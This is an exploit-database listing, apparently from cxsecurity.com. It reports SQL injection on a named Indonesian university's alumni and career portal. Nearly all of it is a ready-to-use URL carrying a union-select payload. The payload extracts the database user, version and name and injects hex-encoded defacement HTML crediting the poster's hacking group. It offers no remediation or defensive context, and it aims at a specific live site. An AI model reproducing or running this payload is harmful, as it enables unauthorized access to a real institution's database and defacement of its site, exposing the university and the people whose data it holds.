Portal Alumni & Karir UIN Alauddin Sql Injection

2020.01.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Nick name : KHS1N Cyber 07 #Youtube : HCT Sec07 Vulnerabilty : #SQL Injection domain site && payload : http://alumnikarir.uin-alauddin.ac.id/lowongan_umum/fo-detail-lowongan-umum-outside.php?id=-19%27+union+select+1,2,3,concat(0x3c696d67207372633d27687474703a2f2f7777772e736168616261746365726461732e636f6d2f61737365742f666f746f5f6265726974612f4843545f7468756d626e61696c2e706e67273e,0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22726564222073697a653d2235223e496e6a656374204279204b4853314e2043796265722030373c2f666f6e743e3c2f703e,0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22677265656e222073697a653d2233223e47656e657261736920506563696e74612054656e74652d54656e7465204769762c204c696665626f792c206c75782c2068616e64626f64792c204e796f6b2a702043722a2a743c2f666f6e743e3c2f703e,0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22677265656e222073697a653d2236223e557365723a3a3a3c2f666f6e743e3c2f703e,user(),0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22626c7565222073697a653d2236223e56657273693a3a3a3c2f666f6e743e3c2f703e,version(),0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d226f72616e6765222073697a653d2236223e44617461626173653a3a3a3c2f666f6e743e3c2f703e,database()),5,6,7,8,9,10,11--+-- HCI Indonesia and for all member


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top